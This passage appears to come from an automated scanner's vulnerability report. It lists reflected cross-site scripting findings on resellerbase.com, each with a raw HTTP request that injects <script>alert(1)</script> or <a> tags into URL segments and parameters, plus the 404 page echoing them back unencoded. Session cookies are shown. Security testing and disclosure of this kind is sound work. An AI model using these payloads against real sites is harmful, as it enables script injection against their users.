The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61b8c<script>alert(1)</script>1582439018e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail61b8c<script>alert(1)</script>1582439018e/35/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail61b8c<script>alert(1)</script>1582439018e/35/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.2387. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8bbe1<script>alert(1)</script>461316c6734 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/358bbe1<script>alert(1)</script>461316c6734/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/358bbe1<script>alert(1)</script>461316c6734/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.2388. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b905<script>alert(1)</script>a969ef47afd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes8b905<script>alert(1)</script>a969ef47afd/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes8b905<script>alert(1)</script>a969ef47afd/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.2389. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 33032<script>alert(1)</script>4b57522e688 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos33032<script>alert(1)</script>4b57522e688/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos33032<script>alert(1)</script>4b57522e688/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.2390. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e138f<script>alert(1)</script>c2dbc105bf6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/imagese138f<script>alert(1)</script>c2dbc105bf6/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/imagese138f<script>alert(1)</script>c2dbc105bf6/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.2391. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1a305<script>alert(1)</script>6de7fcb9614 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating1a305<script>alert(1)</script>6de7fcb9614/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating1a305<script>alert(1)</script>6de7fcb9614/3half.gif was not found on this server.</p>
...[SNIP]...

2.2392. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload ff297<script>alert(1)</script>d7ffd6a9d2f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating/3half.gifff297<script>alert(1)</script>d7ffd6a9d2f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/3half.gifff297<script>alert(1)</script>d7ffd6a9d2f was not found on this server.</p>
...[SNIP]...

2.2393. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e3933<script>alert(1)</script>128990fbf01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating/3half.gif?e3933<script>alert(1)</script>128990fbf01=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/3half.gif?e3933<script>alert(1)</script>128990fbf01=1 was not found on this server.</p>
...[SNIP]...

2.2394. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61160<script>alert(1)</script>c69e6f8e4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail61160<script>alert(1)</script>c69e6f8e4d/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail61160<script>alert(1)</script>c69e6f8e4d/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2395. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76f6d<script>alert(1)</script>a085e74cd87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3576f6d<script>alert(1)</script>a085e74cd87/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3576f6d<script>alert(1)</script>a085e74cd87/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2396. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e2ed3<script>alert(1)</script>265800b6cf2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themese2ed3<script>alert(1)</script>265800b6cf2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themese2ed3<script>alert(1)</script>265800b6cf2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2397. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 12734<script>alert(1)</script>f1a52979d6a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos12734<script>alert(1)</script>f1a52979d6a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos12734<script>alert(1)</script>f1a52979d6a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2398. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a3155<script>alert(1)</script>808b228c490 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/imagesa3155<script>alert(1)</script>808b228c490/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/imagesa3155<script>alert(1)</script>808b228c490/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2399. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5bd58<script>alert(1)</script>6f67f4a1ac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating5bd58<script>alert(1)</script>6f67f4a1ac/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating5bd58<script>alert(1)</script>6f67f4a1ac/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2400. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c740d<script>alert(1)</script>27ed1fc8c7e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating/search.phpc740d<script>alert(1)</script>27ed1fc8c7e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/search.phpc740d<script>alert(1)</script>27ed1fc8c7e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2401. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cc7e7<a>a97644dbc8e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. The reflection point here is the same unencoded echo of the request URI in the 404 page that reflected a complete <script> payload for the other parameters of this URL, so do not assume a filter specific to this parameter exists; verify by hand with the same payload before rating it as a separate, lesser issue.

Request

GET /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchcc7e7<a>a97644dbc8e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchcc7e7<a>a97644dbc8e&opt=2 was not found on this server.</p>
...[SNIP]...

2.2402. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c35a2<a>fe5424f19bb was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/rating/search.php?keyword=search...c35a2<a>fe5424f19bb&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/search.php?keyword=search...c35a2<a>fe5424f19bb&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2403. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 91888<script>alert(1)</script>e5ce3b634d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&91888<script>alert(1)</script>e5ce3b634d2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&91888<script>alert(1)</script>e5ce3b634d2=1 was not found on this server.</p>
...[SNIP]...

2.2404. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ef2ff<a>944f4a867e6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

